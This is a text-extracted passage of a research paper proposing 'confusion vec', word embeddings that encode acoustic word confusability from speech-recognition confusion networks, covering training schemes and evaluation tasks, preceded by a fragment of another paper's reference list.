of aistats. jun suzuki, hideki isozaki, xavier carreras, and michael collins. . an empirical study of semi-supervised structured conditional models for dependency parsing. in proc. of emnlp. hiroyasu yamada and yuji matsumoto. . statistical dependency analysis with support vector machines. in proc. of iwpt. yue zhang and stephen clark. . a tale of t- wo parsers: investigating and combining graph-based and transition-based dependency parsing. in proc. of emnlp. hao zhang and ryan mcdonald. . generalized higher-order dependency parsing with cube pruning. in proc. of emnlp. yue zhang and joakim nivre. . transition-based dependency parsing with rich non-local features. in proc. of acl-hlt. confusion vec: towards enriching vector space word representations with representational ambiguities confusion vec: towards enriching vector space word representations with representational ambiguities prashanth gurunath shivakumar and panayiotis georgiou electrical and computer engineering, university of southern california, los angeles, ca, usa abstract word vector representations are a crucial part of natural language processing (nlp) and human computer interaction. in this paper, we propose a novel word vector representation, confusion vec, motivated from the human speech production and perception that encodes representational ambiguity. humans employ both acoustic similarity cues and contextual cues to decode information and we focus on a model that incorporates both sources of information. the representational ambiguity of acoustics, which manifests itself in word confusions, is often resolved by both humans and machines through contextual cues. a range of representational ambiguities can emerge in various domains further to acoustic perception, such as morphological transformations, word segmentation, paraphrasing for nlp tasks like machine translation, etc. in this work, we present a case study in application to automatic speech recognition (asr) task, where the word representational ambiguities/confusions are related to acoustic similarity. we present several techniques to train an acoustic perceptual similarity representation ambiguity. we term this confusion vec and learn on unsupervised-generated data from asr confusion networks or lattice-like structures. appropriate evaluations for the confusion vec are formulated for gauging acoustic similarity in addition to semantic–syntactic and word similarity evaluations. the confusion vec is able to model word confusions efficiently, without compromising on the semantic-syntactic word relations, thus effectively enriching the word vector space with extra task relevant ambiguity information. we provide an intuitive exploration of the two-dimensional confusion vec space using principal component analysis of the embedding and relate to semantic relationships, syntactic relationships, and acoustic relationships. we show through this that the new space preserves the semantic/syntactic relationships while robustly encoding acoustic similarities. the potential of the new vector representation and its ability in the utilization of uncertainty information associated with the lattice is demonstrated through small examples relating to the task of asr error correction. subjects artificial intelligence, natural language and speech keywords confusion vec, word vec, embeddings, word representations, confusion networks, asr output representations, lexical representational ambiguity introduction decoding human language is challenging for machines. 
it involves estimation of efficient, meaningful representation of words. machines represent the words in the form of real how to cite this article gurunath shivakumar p, georgiou p. . confusion vec: towards enriching vector space word representations with representational ambiguities. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted april published june corresponding author panayiotis georgiou, georgiou@sipi.usc.edu academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright gurunath shivakumar and georgiou distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:georgiou@�sipi.�usc.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ vectors and the language as a vector space. vector space representations of language have applications spanning natural language processing (nlp) and human computer interaction fields. more specifically, word embeddings can act as features for machine translation, automatic speech recognition (asr), document topic classification, information retrieval, sentiment classification, emotion recognition, behavior recognition, question answering, etc. early work employed words as the fundamental unit of feature representation. this could be thought of as each word representing an orthogonal vector in a n-dimensional vector space of language with n-words (often referred to as one-hot representation). such a representation, due to the inherent orthogonality, lacks crucial information regarding inter–word relationships such as similarity. several techniques found using co-occurrence information of words are a better feature representation (ex: n-gram language modeling). subsequent studies introduced few matrix factorization based techniques to estimate a more efficient, reduced dimensional vector space based on word co-occurrence information. latent semantic analysis (lsa) assumes an underlying vector space spanned by orthogonal set of latent variables closely associated with the semantics/meanings of the particular language. the dimension of this vector space is much smaller than the one-hot representation (deerwester et al., ). lsa was proposed initially for information retrieval and indexing, but soon gained popularity for other nlp tasks. hofmann ( ) proposed probabilistic lsa replacing the co-occurrence information by a statistical class based model leading to better vector space representations. another popular matrix factorization method, the latent dirichlet allocation assumes a generative statistical model where the documents are characterized as a mixture of latent variables representing topics which are described by word distributions (blei, ng & jordan, ). recently, neural networks have gained popularity. they often outperform the n-gram models (bengio et al., ; mikolov et al., ) and enable estimation of more complex models incorporating much larger data than before. various neural network based vector space estimation of words were proposed. bengio et al. ( ) proposed feed- forward neural network based language models which jointly learned the distributed word representation along with the probability distribution associated with the representation. 
estimating a reduced dimension continuous word representation allows for efficient probability modeling, thereby resulting in much lower perplexity compared to an n-gram model. recurrent neural network based language models, with inherent memory, allowed for the exploitation of much longer context, providing further improvements compared to feed forward neural networks (mikolov et al., ). mikolov et al. ( a) proposes a new technique of estimating vector representation (popularly termed word vec) which showed promising results in preserving the semantic and syntactic relationships between words. two novel architectures based on simple log-linear modeling (i) continuous skip-gram and (ii) continuous bag-of-words are introduced. both the models are trained to model local context of word occurrences. the continuous skip-gram model predicts surrounding words given the current word. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ whereas, the continuous bag-of-words model predicts the current word given its context. the task evaluation is based on answering various analogy questions testing semantic and syntactic word relationships. several training optimizations and tips were proposed to further improve the estimation of the vector space by mikolov et al. ( c) and mnih & kavukcuoglu ( ). such efficient representation of words directly influences the performance of nlp tasks like sentiment classification (kim, ), part-of-speech tagging (ling et al., ), text classification (lilleberg, zhu & zhang, ; joulin et al., ), document categorization (xing et al., ), and many more. subsequent research efforts on extending word vec involve expanding the word representation to phrases (mikolov et al., c), sentences and documents (le & mikolov, ). similarly, training for contexts derived from the syntactic dependencies of a word is shown to produce useful representations (levy & goldberg, ). using morphemes for word representations can enrich the vector space and provide gains especially for unknown, rarely occurring, complex words, and morphologically rich languages (luong, socher & manning, ; botha & blunsom, ; qiu et al., ; cotterell & schütze, ; soricut & och, ). likewise, incorporating sub-word representations of words for the estimation of vector space is beneficial (bojanowski et al., ). similar studies using characters of words have also been tried (chen et al., ). yin & schütze ( ) explored ensemble techniques for exploiting complementary information over multiple word vector spaces. studies by mikolov, le & sutskever ( b) and faruqui & dyer ( ) demonstrate that vector space representations are extremely useful in extending the model from one language to another (or multi-lingual extensions) since the semantic relations between words are invariant across languages. some have tried to combine the advantages from both matrix factorization based techniques and local-context word vec models. pennington, socher & manning ( ) proposes global log-bilinear model for modeling global statistical information as in the case of global matrix factorization techniques along with the local context information as in the case of word vec. the goal of this study is to come up with a new vector space representation for words which incorporates the uncertainty information in the form of word confusions present in lattice like structures (e.g., confusion networks). 
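The local-context modeling that the skip-gram word vec model relies on, and that the proposed representation builds on, can be made concrete with a small sketch that only extracts the (current word, context word) training pairs; the example sentence and window size are arbitrary, and real training additionally applies sub-sampling and negative sampling on top of these pairs.

```python
def skipgram_pairs(tokens, skip_window=2):
    """(current word, context word) pairs a skip-gram model is trained on:
    every word predicts the words within skip_window positions of it."""
    pairs = []
    for i, w in enumerate(tokens):
        lo, hi = max(0, i - skip_window), min(len(tokens), i + skip_window + 1)
        pairs += [(w, tokens[j]) for j in range(lo, hi) if j != i]
    return pairs

print(skipgram_pairs("i want to sit".split()))
# [('i', 'want'), ('i', 'to'), ('want', 'i'), ('want', 'to'), ('want', 'sit'), ...]
```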
here, the word confusions refers to any word level ambiguities resultant of perception confusability or any algorithms such as machine translation, asr etc. for example, acoustically confusable words in asr lattices: “two” and “to” (see fig. ). a word lattice is a compact representation (directed acyclic weighted graphs) of different word sequences that are likely possible. a confusion network is a special type of lattice, where each word sequence is made to pass through each node of the graph. the lattices and confusion networks embed word confusion information. the study takes motivation from human perception, that is, the ability of humans to decode information based on two fairly independent information streams (see section “human speech production, perception and hearing” for examples): (i) linguistic context (modeled by word vec like word vector representations), and (ii) acoustic confusability (relating to phonology). gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the present word vector representations like word vec only incorporate the contextual confusability during modeling. however, in order to handle confusability and to decode human language/speech successfully, there is a need to model both the dimensions. although primarily, the motivation is derived from human speech and perception, the confusions are not constrained to acoustics and can be extended to any confusions parallel to the linguistic contexts, for example, confusions present in lattices. most of the machine learning algorithms output predictions as a probability measure. this uncertainty information stream can be expressed in the form of a lattice or a confusion network temporally, and is often found to contain useful information for subsequent processing and analysis. the scope of this work is to introduce a complementary (ideally orthogonal) subspace in addition to the underlying word vector space representation captured by word vec. this new subspace captures the word confusions orthogonal to the syntactic and semantics of the language. we propose confusion vec vector space operating on lattice like structures, specifically word confusion networks. we introduce several training configurations and evaluate their effectiveness. we also formulate appropriate evaluation criterion to assess the performance of each orthogonal subspaces, first independently and then jointly. analysis of the proposed word vector space representation is carried out. the rest of the paper is organized as follows. motivation for confusion vec, that is, the need to model word-confusions for word embeddings, is provided through means of human speech and perception, machine learning, and through potential applications in the section “motivation”. a particular case study is chosen and the problem is formulated in the section “case study: application to automatic speech recognition”. in the section “proposed models”, different training configurations for efficient estimation of word embeddings are proposed. additional tuning schemes for the proposed confusion vec models are presented in the section “training schemes”. evaluation criterion formulation and evaluation database creation is presented in the section “evaluation methods”. experimental setup and baseline system is described in the section “data and experimental setup”. 
results are i eye to two tees seat sit eat seedwant what wand acoustic confusability axis contextual content axis figure an example confusion network for ground-truth utterance “i want to sit.” full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tabulated and discussed in the section “results”. word vector space analysis is performed and findings are presented in the section “vector space analysis”. section “discussion” discusses with the help of few toy examples, the benefits of the confusion vec embeddings for the task of asr error correction. section “conclusion” draws the conclusion of the study and finally the future research directions are discussed in the section “future work”. motivation one efficient way to represent words as vectors is to represent them in a space that preserves the semantic and syntactic relations between the words in the language. word vec describes a technique to achieve such a representation by trying to predict the current word from its local context (or vice-versa) over a large text corpora. the estimated word vectors are shown to encode efficient syntactic-semantic language information. in this work, we propose a new vector space for word representation which incorporates various forms of word confusion information in addition to the semantic and syntactic information. the new vector space is inspired and motivated from the following factors from human speech production and perception and machine learning. human speech production, perception, and hearing in our everyday interactions, confusability can often result in the need for context to decode the underlying words. “please_____ a seat.” (example ) in example , the missing word could be guessed from its context and narrowed down to either “have” or “take.” this context information is modeled through language models. more complex models such as word vec also use the contextual information to model word vector representations. on the other hand, confusability can also originate from other sources such as acoustic representations. “i want to seat” (example ) in example , the underlined word is mispronounced/misheard, and grammatically incorrect. in this case, considering the context there exists a lot of possible correct substitutions for the word “seat” and hence the context is less useful. the acoustic construct of the word “seat” can present additional information in terms of acoustic alternatives/similarity, such as “sit” and “seed.” “i want to s—” (example ) similarly in example , the underlined word is incomplete. the acoustic confusability information can be useful in the above case of broken words. thus, since the confusability is acoustic, purely lexical vector representations like word vec fail to encode or capture it. in this work, we propose to additionally encode the word (acoustic) confusability information to learn a better word embedding. although the motivation is specific to gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ acoustics in this case, it could be extended to other inherent sources of word-confusions spanning various machine learning applications. machine learning algorithms most of the machine learning algorithms output hypothesis as a probability measure. 
such a hypothesis could be represented in the form of a lattice, confusion network or n-best lists. it is often useful to consider the uncertainty associated with the hypothesis for subsequent processing and analysis (see section “potential applications”). the uncertainty information is often, orthogonal to the contextual dimension and is specific to the task attempted by the machine learning algorithms. along this direction, recently, there have been several efforts concentrated on introducing lattice information into the neural network architecture. initially, tree-lstm was proposed enabling tree-structured network topologies to be inputted to the rnns (tai, socher & manning, ), which could be adapted and applied to lattices (sperber et al., ). latticernn was proposed for processing word level lattices for asr (ladhak et al., ). lattice based gated recurrent units (su et al., ) and lattice-to-sequence models (tan et al., ) were proposed for reading word lattice as input, specifically a lattice with tokenization alternatives for machine translation models. latticelstm was adopted for lattice-to-sequence model incorporating lattice scores for the task of speech translation by sperber et al. ( ). buckman & neubig ( ) proposed neural lattice language models which enables to incorporate many possible meanings for words and phrases (paraphrase alternatives). thus, a vector space representation capable of embedding relevant uncertainty information in the form of word confusions present in lattice-like structures or confusion networks along with the semantic and syntactic can be potentially superior to word vec space. case study: application to automatic speech recognition in this work, we consider the asr task as a case study to demonstrate the effectiveness of the proposed confusion vec model in modeling acoustic word-confusability. however, the technique can be adopted for a lattice or confusion network output from potentially any algorithm to capture various patterns as discussed in the section “potential applications,” in which case the confusion-subspace (vertical ambiguity in fig. ), is no longer constrained to acoustic word-confusions. an asr lattice contains multiple paths over acoustically similar words. a lattice could be transformed and represented as a linear graph forcing every path to pass through all the nodes (xue & zhao, ; mangu, brill & stolcke, ). such a linear graph is referred to as a confusion network. figure shows a sample confusion network output by asr for the ground truth “i want to sit.” the confusion network could be viewed along two fundamental dimensions of information (see fig. ): (i) contextual axis—sequential structure of a sentence, (ii) acoustic axis—similarly sounding word alternatives. traditional word vector representations such as word vec only model the contextual gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ information (the horizontal (red) direction in fig. ). the word confusions, for example, the acoustic contextualization as in fig. (the vertical (green) direction in fig. ) is not encoded. we propose to additionally capture the co-occurrence information along the acoustic axis orthogonal to the word vec. this is the main focus of our work, that is, to jointly learn the vertical, word-confusion context and the horizontal, semantic and syntactic context. 
in other words, we hypothesize to derive relationships between the semantics and syntaxes of language and the word-confusions (acoustic-confusion). related work bengio & heigold ( ) trained a continuous word embedding of acoustically alike words (using n-gram feature representation of words) to replace the state space models (hidden markov models, hmms), decision trees, and lexicons of an asr. through the use of such an embedding and lattice re-scoring technique demonstrated improvements in word error rates of asr. the embeddings are also shown to be useful in application to the task of asr error detection by ghannay et al. ( ). a few evaluation strategies are also devised to evaluate phonetic and orthographic similarity of words. additionally, there have been studies concentrating on estimating word embeddings from acoustics (kamper, wang & livescu, ; chung et al., ; levin et al., ; he, wang & livescu, ) with evaluations based on acoustic similarity measures. parallely, word vec like word embeddings have been used successfully to improve asr error detection performance (ghannay, estève & camelin, a; ghannay et al., b). we believe the proposed exploitation of both information sources, that is, acoustic relations and linguistic relations (semantics and syntaxes) will be beneficial in asr and error detection, correction tasks. the proposed confusion vec operates on the lattice output of the asr in contrast to the work on acoustic word embeddings (kamper, wang & livescu, ; chung et al., ; levin et al., ; he, wang & livescu, ) which is directly trained on audio. the proposed confusion vec differs from works by bengio & heigold ( ) and ghannay et al. ( ), which also utilize audio data with the hypothesis that the layer right below softmax layer of a deep end-to-end asr contains acoustic similarity information of words. confusion vec can also be potentially trained without an asr, on artificially generated data, emulating an asr (tan et al., ; sagae et al., ; celebi et al., ; kurata, itoh & nishimura, ; dikici, celebi & saraçlar, ; xu, roark & khudanpur, ). thus, confusion vec can potentially be trained in a completely unsupervised manner and with appropriate model parameterization incorporate various degrees of acoustic confusability, for example, stemming from noise or speaker conditions. further, in contrast to the prior works on lattice encoding rnns (tai, socher & manning, ; sperber et al., ; ladhak et al., ; su et al., ; tan et al., ; buckman & neubig, ), which concentrate on incorporating the uncertainty information embedded in the word lattices by modifying the input architecture for recurrent neural network, we propose to introduce the ambiguity information from the lattices to the word embedding explicitly. we expect similar advantages as with lattice encoding rnns in using the pre-trained confusion vec embedding toward various tasks gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ like asr, machine translation etc. moreover, our architecture doesn’t require memory which has significant advantages in terms of training complexity. we propose to train the embedding in a similar way to word vec models (mikolov et al., a). all the well studied previous efforts toward optimization of training such models (mikolov et al., c; mnih & kavukcuoglu, ), should apply to our proposed model. proposed models in this section, we propose four training schemes for confusion vec. 
the training schemes are based on the word vec model. word vec work (mikolov et al., a) proposed log-linear models, that is, a neural network consisting of a single linear layer (projection matrix) without non-linearity. these models have significant advantages in training complexity. mikolov et al. ( a) found the skip-gram model to be superior to the bag-of-word model in a semantic-syntactic analogy task. hence, we only employ the skip-gram configuration in this work. appropriately, the skip-gram word vec model is also adopted as the baseline for this work. the choice of the skip-gram modeling in this work is mainly based on its popularity, ease of implementation, low complexity, and being a well-proven technique in the community. however, we strongly believe the proposed concept (introducing word ambiguity information) is independent of the modeling technique itself and should translate to relatively newer techniques like glove pennington, socher & manning ( ) and fasttext bojanowski et al. ( ). top-confusion training—c v- we adapt the word vec contextual modeling to operate on the confusion network (in our case confusion network of an asr). figure shows the training configuration of the skip-gram word vec model on the confusion network. the top-confusion model considers the context of only the top hypothesis of the confusion network (single path) for training. w t, w t, w t, w t- , w t- , w t- , w t+ , w t+ , w t+ , w t+ , w t+ , w t+ , w t- , w t- , w t- , c(t- ) c(t- ) c(t+ ) c(t+ ) output c(t) input figure top-confusion vec training scheme for confusion networks. c(t) is a unit word confusion in the confusion network at a time-stamp t, that is, c(t) represents a set of arcs between two adjacent nodes of a confusion network, representing a set of confusable words. wt,i is the ith most probable word in the confusion c(t). word confusions are sorted in decreasing order of their posterior probability: p(wt, ) > p(wt, ) > p(wt, ) : : : . full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for clarity we call this the c v- model since it’s using only the top hypothesis. the words wt- , , wt- , , wt+ , , and wt+ , (i.e., the most probable words in the confusions c(t- ), c(t- ), c(t+ ), and c(t+ ), respectively) are predicted from wt, (i.e., the most probable word in c(t)) for a skip-window of as depicted in fig. . the top hypothesis typically consists of noisy transformations of the reference ground-truth (note: the confusion network will inherently introduce additional paths to the lattice). in the case of a confusion network of an asr, the noisy transformations correspond to acoustic word confusions. thus, the top-confusion model implicitly captures word confusions (co-occurring within the context of the skip-window). intra-confusion training—c v-a next, we explore the direct adaptation of the skip-gram modeling but on the confusion dimension (i.e., considering word confusions as contexts) rather than the traditional sequential context. figure shows the training configuration over a confusion network. in short, every word is linked with every other alternate word in the confusion dimension (i.e., between set of confusable words) through the desired network (as opposed to the temporal context dimension in the word vec training). 
for clarity, since this is only using acoustically alternate words, we call this the c v-acoustics or c v-a model for short. note, we disallow any word being predicted from itself (this constrain is indicated with curved dotted lines in the figure). as depicted in the fig. , the word wt,i w t, w t, w t, c(t) input output w t, w t, w t, c(t) w t+ , w t+ , w t+ , c(t+ ) w t+ , w t+ , w t+ , c(t+ ) w t- , w t- , w t- , c(t- ) w t- , w t- , w t- , c(t- ) figure proposed intra-confusion training scheme for confusion networks. c(t) is a unit word confusion in the confusion network at a time- stamp t, that is, c(t) represents a set of arcs between two adjacent nodes of a confusion network, representing a set of confusable words. wt,i is the ith most probable word in the confusion c(t). word confusions are sorted in decreasing order of their posterior probability: p(wt, ) > p(wt, ) > p(wt, ) : : : . the dotted curved lines denote that the self-mapping is disallowed. full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (confusion context) is predicted from wt,j (current word), where i = , , : : : length(c(t)) and j s i, for each j = , , : : : length(c(t)) for confusion c(t) ∀t. we expect such a model to capture inherent relations over the different word confusions. in the context of an asr lattice, we expect it to capture intrinsic relations between similarly sounding words (acoustically similar). however, the model would fail to capture any semantic and syntactic relations associated with the language. the embedding obtained from this configuration can be fused (concatenated) with the traditional skip-gram word vec embedding to form a new subspace representing both the independently trained subspaces. the number of training samples generated with this configuration is: #samples ¼ xn i¼ di � ðdi � Þ ( ) where n is the number of time steps, di is the number of confusions at the ith time step. inter-confusion training—c v-c in this configuration, we propose to model both the linguistic contexts and the word confusion contexts simultaneously. figure illustrates the training configuration. each word in the current confusion is predicted from each word from the succeeding and preceding confusions over a predefined local context. to elaborate, the words wt-t′,i (context) are predicted from wt,j (current word) for i = , , : : : length(c(t-t′)), j = , , : : : length(c(t)), t′ ∈ , ,- ,- for skip-window of for current confusion c(t)∀t as per fig. . since we assume the acoustic similarities for a word to be co-occurring, we expect to jointly model the co-occurrence of both the context and confusions. for clarity, since even the acoustic similarities are learned through context and not direct w t, w t, w t, w t- , w t- , w t- , w t+ , w t+ , w t+ , w t+ , w t+ , w t+ , w t- , w t- , w t- , c(t) c(t- ) c(t- ) c(t+ ) c(t+ ) input output figure proposed inter-confusion training scheme for confusion networks. c(t) is a unit word confusion in the confusion network at a time- stamp t, that is, c(t) represents a set of arcs between two adjacent nodes of a confusion network, representing a set of confusable words. wt,i is the ith most probable word in the confusion c(t). word confusions are sorted in decreasing order of their posterior probability: p(wt, ) > p(wt, ) > p(wt, ) : : : . full-size doi: . /peerj-cs. 
/fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ acoustic mapping, as in the intra-confusion case, we call the inter-confusion training c v-context or c v-c for short. this also has the additional benefit of generating more training samples than the intra- confusion training. the number of training samples generated is given by: #samples ¼ xn i¼ xiþsw j¼i�sw j ¼i di � dj ( ) where n is the total number of time steps, di is the number of word confusions at the i th time step, sw is the skip-window size (i.e., sample sw words from history and sw words from the future context of current word). inter-confusion training can be viewed as an extension of top-confusion training where the skip-gram modeling is applied to all possible paths through the confusion network. hybrid intra-inter confusion training—c v-� finally, we merge both the intra-confusion and inter-confusion training. for clarity we call this model the c v-� since it combines all the previous cases. this can be seen as a super-set of top-confusion, inter-confusion and intra-confusion training configurations. figure illustrates the training configuration. the words wt-t′,i (context) are predicted from wt,j (current word) for i = , , : : : length(c(t-t′)), j = , , : : : length (c(t)), t′ ∈ , , ,- ,- such that if t′ = then i s j; for skip-window of for current confusion c(t)∀t as depicted in fig. . we simply add the combination of training samples from the above two proposed techniques (i.e., the number of samples is the sum of eqs. ( ) and ( )). w t, w t, w t, w t- , w t- , w t- , w t+ , w t+ , w t+ , w t+ , w t+ , w t+ , w t- , w t- , w t- , c(t) c(t- ) c(t- ) c(t+ ) c(t+ ) input output w t, w t, w t, c(t) figure proposed hybrid-confusion training scheme for confusion networks. c(t) is a unit word confusion in the confusion network at a time- stamp t, that is, c(t) represents a set of arcs between two adjacent nodes of a confusion network, representing a set of confusable words. wt,i is the ith most probable word in the confusion c(t). word confusions are sorted in decreasing order of their posterior probability: p(wt, ) > p(wt, ) > p (wt, ) : : : . the dotted curved lines denote that the self-mapping is disallowed. full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ training schemes model initialization/pre-training very often, it has been found that better model initializations lead to better model convergence (erhan et al., ). this is more significant in the case of under-represented words. moreover, for training the word confusion mappings, it would benefit to build upon the contextual word embeddings, since our final goal is in conjunction with both contextual and confusion information. hence, we experiment initializing all our models with the original google’s word vec model (https://code.google.com/archive/p/word vec/) trained on google news dataset with billion words as described by mikolov et al. ( c). pre-training rules are explained in the flowchart in fig. a. for the words present in the google’s word vec vocabulary, we directly initialize the embeddings with word vec. the embeddings for rest of the words are randomly initialized following uniform distribution. 
model concatenation the hypothesis with model concatenation is that the two subspaces, one representing the contextual subspace (word vec), and the other capturing the confusion subspace can be both trained independently and concatenated to give a new vector space which manifests both the information and hence a potentially useful vector word representation. flowchart for model concatenation is shown in fig. b. the model concatenation can be mathematically represented as: newn�e þe ¼ w vn�e c vn�e ½ � ( ) where new is the new concatenated vector space of dimensions n � e + e , and n is the vocabulary size, e and e are the embedding sizes of w v and c v subspaces, respectively. start w v with pre-training (c v- ) intra/inter/hybrid c v-(a/c/*) concatenate embeddings end start model concatenation joint optimization mode fix weights of baseline contextual subspace fine tuning intra/inter/hybrid c v-(a/c/*) end fixed unrestricted start word google vocab initialize from google w v initialize randomly end yes no (a) flowchart for pre-training/initializing models (b) flowchart for concatenating models (c) flowchart for joint optimization using unrestricted and figure flowcharts for proposed training schemes. full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ joint optimization further to the model concatenation scheme, one could fine-tune the new vector space representation to better optimize to the task criterion (fine-tuning involves re-training end-to-end with a relatively lower learning rate than usual). this could be viewed as a case of relaxing the strict independence between two subspaces as in the case of model concatenation. the fine-tuning itself could be either of the aforementioned proposed techniques. we specifically try two configurations of joint optimization. i. fixed contextual subspace in this configuration, we fix the contextual (word vec) subspace and fine-tune only the confusion subspace. since the word vec already provides robust contextual representation, any fine-tuning on contextual space could possibly lead to sub-optimal state. keeping the word vec subspace fixed also allows the model to concentrate more specifically toward the confusion since the fixed subspace compensates for all the contextual mappings during training. this allows us to constrain the updatable parameters during joint optimization. it also allows for the possibility to directly use available word vec models without modifications. the flowchart for the fixed contextual subspace joint optimization is displayed in fig. c. ii. unrestricted in this configuration, we optimize both the subspaces, that is, the contextual (word vec) and the confusion subspaces. the hypothesis is the fine-tuning allows the two subspaces to interact to achieve the best possible representation. the flowchart for the unrestricted joint optimization is displayed in fig. c. evaluation methods prior literature suggests, there are two prominent ways for evaluating the vector space representation of words. one is based on semantic and syntactic analogy task as introduced by mikolov et al. ( a). the other common approach has been to assess the word similarities by computing the rank-correlation (spearman’s correlation) on human annotated word similarity databases (schnabel et al., ) like wordsim- (finkelstein et al., ). 
although the two evaluations can judge the vector representations of words efficiently for semantics and syntax of a language, we need to device an evaluation criteria for the word confusions, specifically for our case scenario—the acoustic confusions of words. for this, we formulate evaluations for acoustic confusions parallel to the analogy task and the word similarity task. analogy tasks semantic and syntactic analogy task mikolov et al. ( a) introduced an analogy task for evaluating the vector space representation of words. the task was based on the intuition that the words, say “king” is similar to “man” in the same sense as the “queen” is to “woman” and thus relies on answering questions relating to such analogies by performing algebraic operations on word representations. for example, the analogy is correct if the vector(“woman”) is most gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ similar to vector(“king”) - vector(“man”) + vector(“queen”). the analogy question test set is designed to test both syntactic and semantic word relationships. the test set contains five types of semantic questions ( , questions) and nine types of syntactic questions ( , questions). finally, the efficiency of the vector representation is measured using the accuracy achieved on the analogy test set. we employ this for testing the semantic and syntactic (contextual axis as in terms of fig. ) relationship inherent in the vector space. acoustic analogy task the primary purpose of the acoustic analogy task is to independently gauge the acoustic similarity information captured by the embedding model irrespective of the inherent semantic and syntactic linguistic information. adopting a similar idea and extending the same for evaluation of word confusions, we formulate the acoustic confusion analogy task (vertical context test as in terms of fig. ) as follows. for similar sounding word pairs, “see” & “sea” and “red” & “read,” the word vector “see” is similar to “sea” in the same sense as the word “red” is to “read.” we set up an acoustic analogy question set on acoustically similar sounding words, more specifically homophones. table lists a few examples from our data set. a detailed description of the creation of dataset is presented in the section “creation of evaluation datasets.” semantic and syntactic–acoustic analogy task further, rather than evaluating the semantic-syntactic tasks and the acoustic analogy tasks independently, we could test for both together. intuitively, the word vectors in each of the two subspaces should interact together. we would expect for an analogy, “see”- “saw”:“take”-“took,” the word “see” has a homophone alternative in “sea,” thus there is a possibility of the word “see” being confused with “sea” in the new vector space. thus an algebraic operation such as vector(“see”) - vector(“saw”) + vector(“take”) should be similar to vector(“took”) as before. moreover, the vector(“sea”) - vector(“saw”) + vector (“take”) should also be similar to vector(“took”). this is because we expect the vector (“sea”) to be similar to vector(“see”) under the acoustic subspace. we also take into account the more challenging possibility of more than one homophone word substitution. for example, vector(“see”) - vector(“saw”) + vector(“allow”) is similar to vector(“allowed”), vector(“aloud”), and vector(“sea”) - vector(“saw”) + vector(“allow”). 
the hypothesis is that to come up with such a representation the system should jointly model both the language semantic-syntactic relations and the acoustic word similarity relations between words. the task is designed to test semantic–acoustic relations and the syntactic–acoustic relationships. in other words, in terms of fig. , the task evaluates both the horizontal and vertical context together. a few examples of this task is listed in table . in the section “creation of evaluation datasets” details the creation of the database. similarity ratings word similarity ratings along with the analogy task the word similarity task (finkelstein et al., ) has been popular to evaluate the quality of word vector representations in the nlp community gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (pennington, socher & manning, ; luong, socher & manning, ; huang et al., ; schnabel et al., ). in this work, we employ the wordsim- dataset (finkelstein et al., ) for the word similarity task. the dataset has a set of word pairs with a diverse range of human annotated scores relating to the similarity/dissimilarity of the two words. the rank-order correlation (spearman correlation) between the human annotated scores and the cosine similarity of word vectors is computed. higher correlation corresponds to better preservation of word similarity order represented by the word vectors, and hence better quality of the embedding vector space. acoustic similarity ratings employing a similar analogous idea to word similarity ratings and extending it to reflect the quality of word confusions, we formulate an acoustic word similarity task. the attempt is to have word pairs scored similar to as in wordsim- database, but with the scores reflecting the acoustic similarity. table lists a few randomly picked examples from our dataset. the dataset generation is described in the section “creation of evaluation datasets”. data and experimental setup database we employ fisher english training part , speech (ldc s ) and fisher english training part , speech (ldc s ) corpora (cieri, miller & walker, ) for training the asr. the corpora consists of approximately , h of telephone conversational speech data sampled at khz. a total of , speakers were involved in the recordings. the speech corpora is split into three speaker disjoint subsets for training, development and testing for asr modeling purposes. a subset of the speech data containing approximately , h were segmented into , , utterances to train the asr. both the development set and the test set consists of , utterances worth h of speech data each. the transcripts contain approximately . million word tokens with , unique entries. experimental setup automatic speech recognition kaldi toolkit is employed for training the asr (povey et al., ). a hybrid dnn-hmm based acoustic model is trained on high resolution ( dimensional) mel frequency cepstral coefficients along with i-vector features to provide speaker and channel information table few examples from acoustic analogy task test-set. word pair word pair i’d eyed phi fie seedar cedar rued rude air aire spade spayed scent cent vile vial cirrus cirrous sold soled curser cursor pendant 